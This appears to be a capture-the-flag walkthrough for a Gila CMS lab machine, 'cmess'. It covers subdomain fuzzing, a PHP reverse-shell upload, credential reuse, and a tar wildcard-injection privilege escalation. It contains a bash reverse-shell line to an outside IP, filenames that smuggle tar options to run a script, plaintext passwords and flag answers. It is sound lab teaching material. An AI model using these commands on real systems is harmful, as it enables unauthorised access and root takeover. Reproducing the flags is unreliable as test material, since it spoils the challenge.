Can you root this Gila CMS box?
scan the machine
nmap -A -T4 10.10.29.227
before starting, add machine to host
echo "10.10.29.227 cmess.thm" >> /etc/hosts
check webpage, we have a gila cms
i tested with the searchbar, nothing there
check robots.txt, seem nothing
i found a login but it'seem normal
as a hint, scan the subdomain, because of restrict from /etc/hosts, i will use wfuzz
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://cmess.thm" -H "Host: FUZZ.cmess.thm" --hw 290
echo "10.10.58.145 dev.cmess.thm" >> /etc/hosts
login to admin panel
now, we can upload a reverse shell
cp /usr/share/webshells/php/php-reverse-shell.php .
vi php-reverse-shell.php
after upload, i see our files in /assets
nc -vlnp 1234
click on http://cmess.thm/assets/php-reverse-shell.php
python3 -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm
Ctrl+Z
stty raw -echo; fg
login to database using the following credential
mysql -u root -p
r0otus3rpassw0rd
show databases;
use gila;
show tables;
SELECT * FROM user;
when we cracked it we indeed found that it's the pass we already had
i found something in /tmp folder
there also contain a backup password in /opt
su andre
UQfsdCB7aAP6
| Flag | user.txt |
|---|---|
| Answer | thm{c529b5d5d6ab6b430b7eb1903b2b5e1b} |
check cronjob, i found something interesting
cat /etc/crontab
it says root will backup everything in our backup folder to /tmp as tar.gz
quick search, i see a Wildcard injection
you can also find it in GTFOBins
create a shell.sh on /home/adre/backup
#!/bin/bash
bash -i >& /dev/tcp/10.18.37.45/4444 0>&1
then we execute the following
echo "" > "--checkpoint-action=exec=bash shell.sh"
echo "" > --checkpoint=1
setup a listener
nc -lnvp 4444
| Flag | root.txt |
|---|---|
| Answer | thm{9f85b7fdeb2cf96985bf5761a93546a2} |